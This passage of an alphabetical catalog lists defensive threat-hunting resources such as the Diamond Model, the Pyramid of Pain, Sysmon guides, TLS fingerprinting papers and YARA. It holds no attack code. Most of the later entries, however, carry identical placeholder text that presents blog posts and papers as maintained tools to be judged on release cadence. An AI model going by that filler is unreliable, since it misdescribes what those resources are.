What it does: Suspicious Domains Tracking Dashboard is a SANS Internet Storm Center diary entry filed under DNS resources, describing a dashboard for tracking suspicious domains seen in your DNS traffic. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: It complements the Proactive Malicious Domain Search entry: one finds candidate domains, the other keeps them visible so that first-seen and resurfacing activity is not lost between hunts.

Typical deployment pattern: Nothing is installed. Rebuild the dashboard in whatever SIEM or DNS analytics platform you already use, feeding it from resolver logs or passive DNS.

Selection considerations: Check that the data sources and tooling the diary assumes are still available, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Syscall Auditing at Scale

  • Website: https://slack.engineering/syscall-auditing-at-scale-e6a3ca8ac1b8
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Syscall Auditing at Scale is a Slack Engineering post on collecting Linux kernel audit (syscall) events across a large fleet, and on go-audit, Slack's open-source replacement for the auditd userspace daemon that ships audit events as JSON. The source list gives no summary beyond the title.

Operational value: Kernel audit gives process execution, file access and network syscall visibility on Linux hosts without a commercial EDR; the post's contribution is the engineering needed to keep that affordable at scale (rule design, output format, volume control).

Typical deployment pattern: Start with a small rule set (execve, privilege-changing syscalls, writes to sensitive paths) on a pilot host group, measure event volume per host, then roll out with the forwarding pipeline and parsers already in place.

Selection considerations: Audit rules are easy to make ruinously noisy; evaluate the approach on the volume it produces per host, and on whether eBPF-based collectors now fit your stack better. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Sysmon Threat Detection Guide

  • Website: https://www.varonis.com/blog/sysmon-threat-detection-guide/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Sysmon Threat Detection Guide is a Varonis blog post introducing Sysmon for threat detection: what the tool logs, how to configure it, and which events are useful for hunting. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: A primer for teams standing up Sysmon for the first time; it helps decide which event IDs to enable before the configuration is tuned for volume.

Typical deployment pattern: Nothing is installed by the guide. Use it alongside a community Sysmon configuration, validate the resulting telemetry in a lab, then forward it to your SIEM.

Selection considerations: Check the guide against the current Sysmon version (event IDs and options have been added over time), and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Letter T

This letter section contains 17 tools.

The Diamond Model of Intrusion Analysis

  • Website: http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The Diamond Model of Intrusion Analysis is the 2013 paper by Caltagirone, Pendergast and Betz that describes every intrusion event through four connected features (adversary, capability, infrastructure and victim) and shows how to chain events into activity threads and group them into campaigns. The source list gives no summary beyond the title. It is an analytic framework, not software.

Operational value: It gives analysts a shared structure for recording what is known about an intrusion and for pivoting from one feature to another (infrastructure to capability, capability to adversary), which keeps investigations consistent across teams.

Typical deployment pattern: Nothing is installed. Adopt the model in case notes and intel reports, and map its features onto the fields of your case management or threat intelligence platform so that pivots are queryable.

Selection considerations: Evaluate it on fit with the frameworks you already use (kill chain, ATT&CK) rather than on maintenance, since it is a paper; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Research Papers.

Back to Name Jump

The DML Model

  • Website: http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The DML Model is a 2014 blog post by Ryan Stillions. Source summaries describe it as: The Detection Maturity Level (DML) model is a capability maturity model for referencing one's maturity in detecting cyber attacks. Its levels run from atomic indicators at the bottom up through artifacts, tools, procedures, techniques and tactics to strategy and goals, so it is a framework for describing detection depth, not software.

Operational value: It lets a team describe where its detections sit on the scale and set goals for moving up from indicator matching towards technique- and tactic-level coverage.

Typical deployment pattern: Nothing is installed. Tag each detection with its DML level, review the distribution, and target the gaps in your detection engineering backlog.

Selection considerations: Judge it on how well it complements ATT&CK and the Pyramid of Pain, which it overlaps with; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The No Hassle Guide to Event Query Language (EQL) for Threat Hunting

  • Website: https://www.varonis.com/blog/guide-no-hassle-eql-threat-hunting/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The No Hassle Guide to Event Query Language (EQL) for Threat Hunting is a Varonis blog post introducing EQL, the event query language (originally from Endgame, now part of Elastic) for expressing event sequences and process relationships in hunting queries. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: EQL's sequence and descendant-of semantics express behaviours (a child process chain, one event followed by another within a window) that are awkward in flat search languages, which is what makes the guide worth reading.

Typical deployment pattern: Nothing is installed by the guide; EQL runs in Elastic or via its stand-alone Python implementation over normalised event data, so schema mapping comes first.

Selection considerations: Check the guide's syntax against the EQL version you will run, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

The osquery Extensions Skunkworks Project

  • Website: https://github.com/trailofbits/presentations/tree/master/Osquery%20Extensions
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The osquery Extensions Skunkworks Project is a Trail of Bits presentation on extending osquery with new tables and capabilities through its extensions interface. The source list gives no summary beyond the title. It is a presentation, not software.

Operational value: Useful for deciding whether a gap in osquery coverage should be closed with an extension rather than a second agent, and for understanding how extensions plug into the core.

Typical deployment pattern: Nothing is installed. Treat it as design input when scoping osquery deployments; extensions are then built, tested and deployed through your normal agent release process.

Selection considerations: Check the content against the current osquery release, and confirm the GitHub path still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

The PARIS Model

  • Website: http://threathunter.guru/blog/the-paris-model/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The PARIS Model is a blog post describing a model for threat hunting. Source summaries describe it as: A model for threat hunting. It is a reference, not software.

Operational value: It gives hunts a repeatable structure so that results are documented and fed back into detection engineering rather than staying with one analyst.

Typical deployment pattern: Nothing is installed. Adopt it as the template for hunt documentation and review.

Selection considerations: Compare it with the other hunting frameworks listed here and pick one to standardise on; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The Pyramid of Pain

  • Website: http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The Pyramid of Pain is David Bianco's 2013 blog post on the relationship between the types of indicators you might use to detect an adversary's activities and how much pain it causes them when you are able to deny those indicators: hash values and IP addresses at the bottom are trivial to change, while tools and TTPs at the top are costly to replace. It is a framework, not software.

Operational value: It is the standard argument for spending detection effort on behaviours (TTPs) and tooling artefacts rather than on indicator feeds alone.

Typical deployment pattern: Nothing is installed. Use it to rank detection backlog items and to explain to stakeholders why indicator-only coverage is weak.

Selection considerations: None of the usual software criteria apply; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The Sysmon and Threat Hunting Mimikatz wiki for the blue team

  • Website: https://www.peerlyst.com/posts/the-sysmon-and-threat-hunting-mimikatz-wiki-for-the-blue-team-guurhart
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The Sysmon and Threat Hunting Mimikatz wiki for the blue team was a Peerlyst community wiki collecting Sysmon-based detections for Mimikatz and related credential-theft tooling. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: A consolidated view of which Sysmon events (process access to LSASS, driver loads, command-line patterns) expose Mimikatz usage.

Typical deployment pattern: Nothing is installed. Translate the listed observations into rules for your SIEM and verify them against a controlled Mimikatz execution in a lab.

Selection considerations: Peerlyst shut down in 2020, so the link is unlikely to resolve; look for an archived copy before relying on it. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

The ThreatHunting Project

  • Website: https://github.com/ThreatHuntingProject/ThreatHunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The ThreatHunting Project is a GitHub repository of threat hunting resources, including a library of documented hunts with the data sources and analysis each requires. Source summaries describe it as a collection of threat hunting resources.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

The use of TLS in Censorship Circumvention

  • Website: https://tlsfingerprint.io/static/frolov2019.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: The use of TLS in Censorship Circumvention is a 2019 NDSS paper by Frolov and Wustrow, hosted at tlsfingerprint.io, on how the TLS ClientHello fingerprints of circumvention tools differ from those of popular browsers, making the tools identifiable and blockable. The source list gives no summary beyond the title. It is a research paper, not software.

Operational value: The fingerprinting that censors use applies equally to defenders: any client whose ClientHello does not match the software it claims to be (malware mimicking a browser, a tunnelling tool on the corporate network) stands out, and the paper's data shows how rare or common a given fingerprint is.

Typical deployment pattern: Nothing is installed by the paper. Pair it with a sensor that extracts TLS fingerprints and with the tlsfingerprint.io dataset for prevalence.

Selection considerations: Fingerprint prevalence shifts as browsers update, so the paper's numbers are a snapshot; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Threat Hunting

  • Website: https://posts.specterops.io/tagged/threat-hunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Threat Hunting is the tag feed of the SpecterOps blog for posts on threat hunting. The source list gives no summary beyond the title. It is a reference collection, not software.

Operational value: A source of detailed, technique-level hunting write-ups, often with the telemetry and queries needed to reproduce them.

Typical deployment pattern: Nothing is installed. Track new posts and turn applicable ones into candidate detections or hunts.

Selection considerations: Posts vary in age, so verify each against current tooling; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Threat Hunting with Sysmon: Word Document with Macro

  • Website: http://www.syspanda.com/index.php/2017/10/10/threat-hunting-sysmon-word-document-macro/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Threat Hunting with Sysmon: Word Document with Macro is a syspanda blog post walking through the Sysmon events produced when a Word document with a malicious macro runs, and how to hunt for that chain. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: Macro-launched child processes (Office spawning a shell or script host) remain a common initial-access pattern, and the post shows which Sysmon process-creation fields capture it.

Typical deployment pattern: Nothing is installed. Reproduce the chain in a lab with Sysmon, confirm the parent-child relationship appears in your SIEM, then write the rule.

Selection considerations: The post dates from 2017; check its event details against current Office and Sysmon versions, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

ThreatHunting

  • Website: https://github.com/olafhartong/ThreatHunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: ThreatHunting is Olaf Hartong's Splunk app of hunting dashboards and searches mapped to MITRE ATT&CK, built primarily over Sysmon data. Source summaries describe it as: A Splunk app mapped to MITRE ATT&CK to guide your threat hunts.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

TLS fingerprinting - Smarter Defending & Stealthier Attacking

  • Website: https://blog.squarelemon.com/tls-fingerprinting/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: TLS fingerprinting - Smarter Defending & Stealthier Attacking is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

TLS Fingerprinting in the Real World

  • Website: https://blogs.cisco.com/security/tls-fingerprinting-in-the-real-world
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: TLS Fingerprinting in the Real World is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

TLS Fingerprinting with JA3 and JA3S

  • Website: https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: TLS Fingerprinting with JA3 and JA3S is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Tool Analysis Result Sheet

  • Website: https://jpcertcc.github.io/ToolAnalysisResultSheet/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Tool Analysis Result Sheet is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Tracking Newly Registered Domains

  • Website: https://isc.sans.edu/diary/Tracking+Newly+Registered+Domains/23127
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Tracking Newly Registered Domains is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Letter W

This letter section contains 3 tools.

Windows Commands Abused by Attackers

  • Website: http://blog.jpcert.or.jp/.s/2016/01/windows-commands-abused-by-attackers.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Windows Commands Abused by Attackers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Windows Commands Abused by Attackers

  • Website: https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Windows Commands Abused by Attackers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Windows Hunting

  • Website: https://github.com/beahunt3r/Windows-Hunting
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Windows Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A collection of Windows hunting queries.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Letter Y

This letter section contains 1 tool.

YARA

  • Website: https://github.com/virustotal/yara
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: YARA is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The pattern matching swiss knife.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: Because this is an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.
